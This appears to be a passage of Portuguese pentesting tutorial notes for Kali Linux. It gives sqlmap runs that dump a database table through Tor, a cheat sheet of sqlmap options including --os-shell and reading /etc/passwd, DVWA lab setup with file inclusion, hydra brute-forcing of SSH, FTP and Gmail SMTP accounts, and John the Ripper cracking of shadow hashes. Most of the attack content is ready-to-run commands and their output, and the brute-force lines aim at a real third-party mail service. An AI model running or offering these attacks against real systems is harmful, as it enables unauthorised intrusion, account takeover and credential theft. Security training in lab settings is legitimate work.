Check Point ZoneAlarm Z100G firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts:  rs202995.rs.hosteurope.de, localhost.localdomain; OSs: Unix,
Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.11 seconds


----------------------------------------------


*** Digite o comando abaixo em um única linha:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
          --dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program

[*] starting at 12:15:09

[12:15:09] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19'
[12:15:09] [INFO] testing connection to the target URL
[12:15:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:15:14] [INFO] testing if the target URL is stable
[12:15:15] [INFO] target URL is stable
[12:15:15] [INFO] testing if GET parameter 'artist' is dynamic
[12:15:15] [INFO] confirming that GET parameter 'artist' is dynamic
[12:15:15] [INFO] GET parameter 'artist' is dynamic
[12:15:15] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[12:15:16] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n]  y 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n]  y 
[12:15:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:15:20] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[12:15:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[12:15:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:15:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:15:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:15:26] [WARNING] time-based comparison requires larger statistical model, please wait.
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:15:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:15:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:15:27] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[12:15:28] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test
[12:15:29] [INFO] target URL appears to have 3 columns in query
[12:15:31] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]  n 
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5619=5619

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:16:02] [INFO] testing MySQL
[12:16:02] [INFO] confirming MySQL
[12:16:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[12:16:03] [INFO] fetching database names
[12:16:03] [INFO] the SQL query used returns 2 entries
[12:16:03] [INFO] starting 2 threads
[12:16:03] [INFO] retrieved: acuart
[12:16:03] [INFO] retrieved: information_schema
available databases [2]:
[*] acuart
[*] information_schema

[12:16:03] [INFO] fetched data logged to text files under
  '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 12:16:03


----------------------------------------------


*** Digite o comando abaixo em um única linha:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--current-user --is-dba --current-db --hostname --time-sec=3 --threads=3
--technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 12:29:55

[12:29:55] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9)
Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
[12:29:55] [INFO] resuming back-end DBMS 'mysql'
[12:29:55] [INFO] testing connection to the target URL
[12:29:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5619=5619

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:29:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[12:29:56] [INFO] fetching current user
current user:    'acuart@localhost'
[12:29:56] [INFO] fetching current database
current database:    'acuart'
[12:29:56] [INFO] fetching server hostname
hostname:    'rs202995'
[12:29:57] [INFO] testing if current user is DBA
[12:29:57] [INFO] fetching current user
[12:29:57] [WARNING] in case of continuous data retrieval problems you are advised to
try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[12:29:57] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 12:29:57


----------------------------------------------

Extraindo o conteúdo dos campos:

Digite a linha abaixo em uma única linha:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2"
           -D acuart -T users -C uname,pass,cc,name --dump  --time-sec=3
           --threads=3 --technique=BEUS --random-agent
           --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program

[*] starting at 13:33:01

[13:33:01] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
(Macintosh; I; PPC)'
[13:33:02] [INFO] resuming back-end DBMS 'mysql'
[13:33:02] [INFO] testing connection to the target URL
[13:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=2 AND 4071=4071

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-9556 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,
0x554a4f78466953624f7376665a524e7a4c5867666476706566546a49634e6f545a76784d6c4a5745,
0x716b706a71)--
---
[13:33:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[13:33:02] [INFO] fetching entries of column(s) 'cc, name, pass, uname'
for table 'users' in database 'acuart'
[13:33:02] [INFO] the SQL query used returns 1 entries
[13:33:02] [INFO] resumed: "1234-5678-2300-9000","teste","test","test"
[13:33:02] [INFO] analyzing table dump for possible password hashes

Database: acuart
Table: users
[1 entry]
+-------+------+---------------------+-------+
| uname | pass | cc                  | name  |
+-------+------+---------------------+-------+
| test  | test | 1234-5678-2300-9000 | teste |
+-------+------+---------------------+-------+

[13:33:02] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'

[13:33:02] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 13:33:02

10 - Some more SqlMap Parameters



Digite a linha abaixo e uma única linha:

proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" 
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

Digite a linha abaixo e uma única linha:


proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

Digite a linha abaixo e uma única linha:

proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

proxychains sqlmap -u "vul_url"  --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

----------------------------------------------

proxychains sqlmap -u "vul_url" --dbms=mysql -D data_base -T table --dump -C login,senha

----------------------------------------------

--level=3 --risk=3  --retries=3 --flush-session --hex --no-cast --batch --banner

--current-user --is-dba --current-db --hostname

--current-user --is-dba --parse-errors -v 3  ( show errors, messages )

--batch --tables --columns -T password --threads=8

--batch --dump -T password -C admin,pass --threads=8 --fresh-queries

--batch --banner --current-user --current-db

--users --current-db --dbs --exclude-sysdbs --tables --columns --flush-session —batch

--level=3 --risk=3 --forms --batch --banner --flush-session

--level=3 --risk=3 --forms --batch --banner --flush-session -p referer

--level=3 --risk=3 --flush-session --technique=B --batch

--level=3 --risk=3  --retries=3 --flush-session --hex --no-cast --batch --banner

----------------------------------------------

--technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt
--fresh-queries > /root/scan_out.txt

----------------------------------------------

--data=‘cat payload’ prefix="1’,1;" --suffix="-" --dns-domain=acme.com --os-shell
--fresh-queries --retries=5
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"

----------------------------------------------

--dbms=mysql --level=3 --risk=3 --time-sec=3 --threads=3 --technique=BEUS --random-agent
--no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050 --tamper="between,randomcase,space2comment"
--data "login#2*&senha=123#1*" --alert --crawl=CRAWLDEPTH --regexp --string
--text-only --cookie "security=low; PHPSESSID=daa2374033f2a5fa6b57d9cc22692301"

----------------------------------------------

--batch --file-read="/etc/passwd”

--batch --forms --flush-session --delay=5 --tech=T --hex --crawl=3

--sql-query "SELECT * FROM users”

--sql-query="SELECT user,pass FROM usuarios WHERE user LIKE '%admin%’"

--sql-query "UPDATE SET user ‘jura' WHERE username ‘aris' FROM databaseX.admin" -v 2

–-sql-query=”select * from transactions.sample_tran_table”

--users --passwords --privileges --roles --threads=10

--forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3

--dbms="Microsoft Access"

-–dbms=”Microsoft SQL Server”

--dbms="PostgreSQL"

----------------------------------------------

--data "username=login#2*&senha=123#1*" --dbms=mysql --alert
--crawl=CRAWLDEPTH -level=5 --regexp --string --text-only

----------------------------------------------

--time-sec=7 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050

*** #2* e #1* Indica que são campos posts e os mesmo devem ser injetados

----------------------------------------------

proxychains sqlmap -u "vul_url/index.php?page=login.php" --method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"

----------------------------------------------

-D mysql --sql-query="select usuario, senha from mysql.usuarios order by usuario desc"

-D mysql --sql-query="select column_name from information_schema.columns where
table_name = 'usuarios'"

----------------------------------------------

11 - Setting up dvwa lab

Instalando Laboratório DVWA


No Kali abra o navegador Firefox e a url -> www.dvwa.co.uk

clique no botão "download", será baixado dentro da pasta "Downloads" o arquivo "DVWA-master.zip"


 cd Downloads 

 unzip DVWA-master.zip 

 mv DVWA-master /var/www/html/dvwa 

 cd /var/www/html 

 chmod -R 755 dvwa 

 cd dvwa/config 

 cp config.inc.php.dist config.inc.php 

-----------------------------

Altere algumas linhas abaixo...

 nano /var/www/html/dvwa/config/config.inc.php 


$DBMS = 'MySQL';

# Deixe as linhas abaixo como abaixo:

$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = '';

$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';

$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

-----------------------------

 mysql -u root -p 

 create database dvwa; 

 quit 

-----------------------------

 chmod -R 777 /var/www/html/dvwa/hackable/uploads/ 

 chmod -R 777 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt 

-----------------------------

 nano /etc/php/7.0/apache2/php.ini 

allow_url_include = on

-----------------------------

 service apache2 start 

 service mysql start 

 service mysql status 

 service apache2 status 

-----------------------------

 http://192.168.2.193/dvwa/setup.php 

 User: admin 

 Pass: password 











Digite o ip do servidor ( kali ) e clique no botão "Submit"













-----------------------------

File Inclusion

http://192.168.2.193/dvwa/vulnerabilities/fi/?page=include.php

http://192.168.2.193/dvwa/vulnerabilities/fi/?page=/etc/passwd

12 - Cracking password with "hydra"


No terminal do Kali 2.0 digite os comandos abaixo:


 nmap -sS -sC -sV 192.168.2.193 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-12 01:07 EDT
Nmap scan report for 192.168.2.193
Host is up (0.0000020s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 7d:a9:70:d3:55:c8:cc:6e:c4:ca:c9:c0:0b:bd:3a:a3 (RSA)
|_  256 dc:c1:af:2d:fc:d4:a6:6a:49:5e:4d:b8:d2:9a:d1:19 (ECDSA)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel




Example 1

 hydra -l jura -P passlist.txt 192.168.2.193 ssh -v -V 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 01:01:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.2.193:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.193:22
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "123" - 1 of 6 [child 0] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "jura" - 2 of 6 [child 1] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "eu" - 3 of 6 [child 2] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "pizza" - 4 of 6 [child 3] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "test" - 5 of 6 [child 4] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "teste" - 6 of 6 [child 5] (0/0)
[22][ssh] host: 192.168.2.193   login: jura   password: 123
[STATUS] attack finished for 192.168.2.193 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 01:01:35



Vamos criar um arquivo com algumas senhas.

cat > passlist.txt

123
jura
eu
pizza
test
teste
admin
winner

ctrl + d ( salvar e sair )



Example 2

 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/passlist.txt 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:01:01
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service ftp on port 50000
[50000][ftp] host: 192.168.2.13   login: ewb1   password: 123
[50000][ftp] host: 192.168.2.13   login: ftp1   password: 123
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:01:16


Criando um arquivo usuários.

cat > users.txt

root
admin
administrator
ewb
ewb1
ftp
ftp1

ctrl + d ( salvar e sair )



cat > passlist.txt

123
jura
eu
pizza
test
teste

ctrl + d ( salvar e sair )


Outra forma seria usarmos o arquivo um dicionário de senhas do Kali -> rockyou


No terminal do Kali vamos procurar o arquivo.

 locate *rockyou* 


Descompacte-o.

 gunzip /usr/share/wordlists/rockyou.txt.gz 



Mova o arquivo para o diretório root.

 mv /usr/share/wordlists/rockyou.txt /root/rockyou.txt 



Listando arquivo.

 ls -lh 

-rw-r--r-- 1 root root 134M Mar  3  2013 rockyou.txt



Or ... download wordlist


mkdir -p /usr/share/wordlists/

git clone https://github.com/danielmiessler/SecLists/ /usr/share/wordlists/

cd /usr/share/wordlists/Passwords/Leaked-Databases/

tar -xvzf rockyou-withcount.txt.tar.gz

tar -xvzf rockyou.txt.tar.gz

ls -lhS rock*

 1 jura jura 243M Sep 23  2015 rockyou-withcount.txt

 1 jura jura 134M Sep 23  2015 rockyou.txt
-rw-r--r-- 1 root root  54M Nov 30 15:20 rockyou-withcount.txt.tar.gz
-rw-r--r-- 1 root root  51M Nov 30 15:20 rockyou.txt.tar.gz
-rw-r--r-- 1 root root 468K Nov 30 15:20 rockyou-75.txt
-rw-r--r-- 1 root root 337K Nov 30 15:20 rockyou-70.txt
-rw-r--r-- 1 root root 239K Nov 30 15:20 rockyou-65.txt
-rw-r--r-- 1 root root 167K Nov 30 15:20 rockyou-60.txt
-rw-r--r-- 1 root root 113K Nov 30 15:20 rockyou-55.txt
-rw-r--r-- 1 root root  75K Nov 30 15:20 rockyou-50.txt
-rw-r--r-- 1 root root  48K Nov 30 15:20 rockyou-45.txt
-rw-r--r-- 1 root root  31K Nov 30 15:20 rockyou-40.txt
-rw-r--r-- 1 root root  20K Nov 30 15:20 rockyou-35.txt
-rw-r--r-- 1 root root  12K Nov 30 15:20 rockyou-30.txt
-rw-r--r-- 1 root root 7.1K Nov 30 15:20 rockyou-25.txt
-rw-r--r-- 1 root root 4.0K Nov 30 15:20 rockyou-20.txt
-rw-r--r-- 1 root root 1.9K Nov 30 15:20 rockyou-15.txt
-rw-r--r-- 1 root root  723 Nov 30 15:20 rockyou-10.txt
-rw-r--r-- 1 root root  104 Nov 30 15:20 rockyou-05.txt

rm *.tar.gz

du -sch /usr/share/wordlists/Passwords/

282M	/usr/share/wordlists/Passwords/
282M	total

hydra -l jura -p /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.10.108 -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh

hydra -l root -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.1.105 -t 4 -e nsr ssh


Usando o dicionário.

 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/rockyou.txt 




Example 3

 hydra -l root -P passlist.txt 192.168.2.13 ssh 

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:11:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.2.13   login: root   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:11:58




Example 4


Brute force em um email do google.


 hydra -S -l emailx@gmail.com -P /usr/share/wordlists/nmap.lst -e ns -V -s 465 smtp.gmail.com smtp 


 hydra -S -l 2helpmeout@gmail.com -P /root/users.txt -P /root/rockyou.txt -e ns -V -s 465 smtp.gmail.com smtp 


 hydra -t 5 -V -f -l jura -P passlist.txt localhost ssh 


 hydra -t 5 -V -f -l root -e ns -P passlist.txt localhost mysql 


13 - Cracking passwords with john the ripper


No terminal do Kali 2.0 digite os comandos abaixo:

 unshadow /etc/shadow /etc/passwd >> mypasswd.txt  


 cat mypasswd.txt 

root:$6$MH8TLS/Q$C3Vtt7RaOIcWXLcnva71/RPoj9TJ6g42xgCG0HqpJMPrkIAAKSLKjo2MRNgu3/wPiIaXg/PFB9w9gPq/mQhXC.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:*:104:65534::/nonexistent:/bin/false
mysql:!:105:109:MySQL Server,,,:/nonexistent:/bin/false
epmd:*:106:110::/var/run/epmd:/bin/false
Debian-exim:!:107:111::/var/spool/exim4:/bin/false
uuidd:*:108:113::/run/uuidd:/bin/false
rwhod:*:109:65534::/var/spool/rwho:/bin/false
iodine:*:110:65534::/var/run/iodine:/bin/false
miredo:*:111:65534::/var/run/miredo:/bin/false
ntp:*:112:114::/home/ntp:/bin/false
stunnel4:!:113:116::/var/run/stunnel4:/bin/false
redsocks:!:114:117::/var/run/redsocks:/bin/false
rtkit:*:115:118:RealtimeKit,,,:/proc:/bin/false
postgres:*:116:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:*:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:*:118:120::/var/run/dbus:/bin/false
arpwatch:!:119:122:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
usbmux:*:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sslh:!:122:126::/nonexistent:/bin/false
geoclue:*:123:128::/var/lib/geoclue:/bin/false
couchdb:*:124:129:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
avahi:*:125:131:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:*:126:65534::/var/run/sshd:/usr/sbin/nologin
colord:*:127:132:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:*:128:134::/var/lib/saned:/bin/false
speech-dispatcher:!:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:*:130:135:PulseAudio daemon,,,:/var/run/pulse:/bin/false
king-phisher:*:131:137::/var/lib/king-phisher:/bin/false
Debian-gdm:*:132:139:Gnome Display Manager:/var/lib/gdm3:/bin/false
dradis:*:133:140::/var/lib/dradis:/bin/false
beef-xss:*:134:141::/var/lib/beef-xss:/bin/false
jura:$6$Kxd.KdHp$VioUe6iuTfhFLUp0cC.2LcN5pQ0wqdQ44YPL.3fefmvY2IyVA2yCAGgui/.IouHIX2CuR873KeKXJsMNaWI7v/:1000:1000:,,,:/home/jura:/bin/bash
privoxy:*:121:65534::/etc/privoxy:/bin/false
debian-tor:*:135:125::/var/lib/tor:/bin/false
Debian-snmp:!:136:142::/var/lib/snmp:/bin/false


 /usr/sbin/john --wordlist=passlist.txt --rules mypasswd.txt 

Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123              (root)
123              (jura)
2g 0:00:00:00 DONE (2017-05-12 02:33) 6.666g/s 213.3p/s 426.6c/s 426.6C/s 123..jura4
Use the "--show" option to display all of the cracked passwords reliably
Session completed


 /usr/sbin/john --show mypasswd.txt 

root:123:0:0:root:/root:/bin/bash
jura:123:1000:1000:,,,:/home/jura:/bin/bash

2 password hashes cracked, 0 left

14 - HashKiller


